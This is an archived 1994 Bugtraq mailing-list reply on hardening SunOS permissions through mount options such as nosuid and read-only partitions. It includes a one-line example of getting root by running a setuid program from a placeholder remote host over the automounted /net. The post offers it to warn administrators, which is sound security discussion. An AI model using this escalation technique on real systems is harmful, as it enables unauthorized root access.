Bugtraq mailing list archives

Re: permissions

From: shipley () merde dis org (Evil Pete)
Date: Tue, 17 May 1994 02:31:13 -0700


"Pat Myrto" has been known to say:


There is a patch, that is nothing more than a script that improves
the perms that is available, at least for SunOS 4.1.x.  As you point out
it changes /etc/ from bin to root, and the same with a lot of other
subdirs.  How complete it is, I don't know but it is far better than
the original.



To get the permissions right under SunOS you have to do it yourself

mount:

/               rw,nosuid
/usr            ro
/var            rw,nosuid
/home           rw,nosuid
/tmp            rw,nosuid
/usr/local      ro

and for automount/afs users:
/net            rw,nosuid,nodev


this way there is not place to install a setuid program/backdoor
and most of the system binaries are on a readonly partition.

as for sun automount (afs is better :-)  I find most sites that
setup /net forget to disable setuid, thus anyone can get root my typing
the command:

        /net/unsecure.host.another.dom/tmp/make_be_root

Current thread:

Re: Time For New Security Package? (was Re: new iss stuff), (continued)
- - - Re: Time For New Security Package? (was Re: new iss stuff) Tom Fitzgerald (May 10)
    - Re: Time For New Security Package? (was Re: new iss stuff) Oliver Friedrichs (May 11)
    - ANNOUNCING THE [8LGM] FILESERVER & MAILING LIST INFO Karl Strickland (May 14)
    - Re: Time For New Security Package? (was Re: new iss stuff) Gene Spafford (May 14)
    - The ISS Program Paul Robinson (May 10)
    - wolves and sheep on the inet Timothy Newsham (May 11)
    - Re: wolves and sheep on the inet Gene Spafford (May 13)
    - Re: wolves and sheep on the inet Steve Simmons (May 13)
    - permissions Perry E. Metzger (May 16)
    - Re: permissions Pat Myrto (May 16)
    - Re: permissions Evil Pete (May 17)
    - Re: permissions Pat Myrto (May 17)
    - Re: permissions Gene Spafford (May 17)
    - Re: permissions Evil Pete (May 18)
    - Re: permissions Evil Pete (May 18)
    - [8lgm]-Advisory-7.UNIX.passwd.11-May-1994.NEWFIX [8LGM] Security Team (May 13)
    - iss equivalents *Hobbit* (May 11)
    - Source vs. binary for tools Jeremy Epstein -C2 PROJECT (May 12)
    - runaway lockd problems (SunOS 4.1.3) Pat Myrto (May 12)
    - [8lgm]-Advisory-7.UNIX.passwd.11-May-1994 [8LGM] Security Team (May 12)
    - Re: [8lgm]-Advisory-7.UNIX.passwd.11-May-1994 Pat Myrto (May 13)

(Thread continues...)